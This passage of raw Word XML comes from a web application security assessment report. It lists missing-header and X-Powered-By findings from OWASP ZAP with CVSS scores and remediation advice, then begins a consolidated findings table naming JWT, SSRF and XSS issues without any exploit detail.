                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Multiple Security Headers Missing (COEP, COOP, CORP, Permissions-Policy, X-Content-Type-Options)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="63A72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639788">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source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3DB743">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DAST — OWASP ZAP (5 related alerts)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="11B1E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639316">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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tcPr>
          <w:p w14:paraId="4ACFE9FC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="72518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12DB22">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</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78F6FB">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A05:2021 — Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1F9B7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58F0E4">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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6C0A11">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-693: Protection Mechanism Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="15F81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31098B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS v3.1</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9D3BAE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7 (AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6629A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2C203F">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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757B22">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Missing headers: Cross-Origin-Embedder-Policy, Cross-Origin-Opener-Policy, Cross-Origin-Resource-Policy, Permissions-Policy, X-Content-Type-Options. These headers provide defense-in-depth against Spectre-class side-channel attacks, MIME sniffing, and unauthorized use of browser features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="648FF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AC133B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Business Impact</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A91B38">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Without these headers, the application is more susceptible to cross-origin data leaks and MIME-type confusion attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1D610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533B2B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reproduction Steps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7C6F26">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Automated: ZAP detects all missing headers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="60AA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3E5B1E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommended Fix</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778618">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Install and configure helmet middleware: app.use(helmet()). This sets all standard security headers with secure defaults.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4348C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DB93B6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation Status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050EAC">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38AA9613">
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3470BAD1">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>VD-013: X-Powered-By Header Leaks Server Technology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8409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E2E320">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding ID</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340586">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-013</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="416B3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B9B188">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Title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7B5A19">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>X-Powered-By: Express Header Reveals Server Technology</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="09A48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DF7782">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source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58A1F7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DAST — OWASP ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1E237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B39448">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="716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tcPr>
          <w:p w14:paraId="1B4DC230">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3C27B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BA3040">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP Top 10</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85C70B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A05:2021 — Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5F0F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501484">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE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450B44">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-497: Exposure of Sensitive System Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="23396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CED9F5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVSS v3.1</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5E9884">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2.6 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5C093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4F9929">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Description</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7C6F9A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Every HTTP response includes X-Powered-By: Express, revealing the server framework to potential attackers and aiding reconnaissance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="29B88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D6BF94">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Business Impact</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5283EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Information disclosure aids attacker reconnaissance by identifying the framework and enabling targeted exploit selection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="26E7F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E26A04">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reproduction Steps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F2A83C">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Automated: ZAP detects the header.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0580F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AE31F6">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Recommended Fix</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005BFF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Add: app.disable('x-powered-by') or use helmet which removes it by default.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="310BF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7BA55E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Remediation Status</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944FC7">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F79A0F0"/>
    <w:p w14:paraId="1BBBAF64">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>5. Consolidated Findings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800"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="2360"/>
      </w:tblGrid>
      <w:tr w14:paraId="2F5B5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3B9A5A60">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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55E98561">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1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7FFAB468">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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668A6EDE">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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1643F1A5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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211C54F2">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="358DF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082D8D">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-001</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89966E">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hardcoded JWT secret</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9B0C8B">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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tcPr>
          <w:p w14:paraId="763F2865">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</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0C3B71">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A07:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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8C0D74">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="270EB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2FB7F1">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-002</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0CF3D3">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SSRF via EPUB proxy</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255411">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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tcPr>
          <w:p w14:paraId="3EC62477">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</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B51DD9">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A10:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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21C715">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="46826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6C5F1A">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>VD-003</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0E9EC5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Stored XSS via EPUB upload</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10A8EF">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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tcPr>
          <w:p w14:paraId="2C5BB6B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Critical</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F761CD">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A03:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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0E3C66">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="2C3E50"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
